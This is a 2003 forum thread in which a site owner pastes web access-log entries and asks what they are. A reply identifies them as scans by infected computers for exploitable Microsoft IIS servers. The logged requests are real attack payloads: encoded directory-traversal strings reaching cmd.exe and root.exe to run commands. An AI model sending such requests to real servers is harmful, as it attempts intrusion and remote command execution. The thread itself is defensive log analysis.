View previous topic :: View next topic |
Author |
Message |
eznetlinks -
Joined: 27 Sep 2003 Posts: 144
|
Posted: Sat Sep 27, 2003 11:39 pm Post subject: access log |
|
|
What are these entries in my access log:
12.253.89.217 - - [26/Sep/2003:18:41:22 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 120
12.253.89.217 - - [26/Sep/2003:18:41:23 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 120
12.253.89.217 - - [26/Sep/2003:18:41:23 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 120
12.253.89.217 - - [26/Sep/2003:18:41:23 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 120
12.253.89.217 - - [26/Sep/2003:18:41:23 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130
12.253.89.217 - - [26/Sep/2003:18:41:33 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130
12.253.89.217 - - [26/Sep/2003:18:41:33 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130
12.253.89.217 - - [26/Sep/2003:18:41:33 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130
12.253.89.217 - - [26/Sep/2003:18:41:33 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130
12.253.89.217 - - [26/Sep/2003:18:41:33 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130
12.253.89.217 - - [26/Sep/2003:18:41:33 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130
12.253.89.217 - - [26/Sep/2003:18:41:33 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130
12.253.89.217 - - [26/Sep/2003:18:41:34 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130
12.253.89.217 - - [26/Sep/2003:18:41:34 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 130 |
|
Back to top |
|
 |
Anonymoose -
Joined: 09 Sep 2003 Posts: 2192
|
Posted: Mon Sep 29, 2003 3:09 pm Post subject: |
|
|
Scans by infected computers for infectable / exploitable Microsoft IIS systems. You're not running IIS, so you can safely ignore them :D |
|
Back to top |
|
 |
|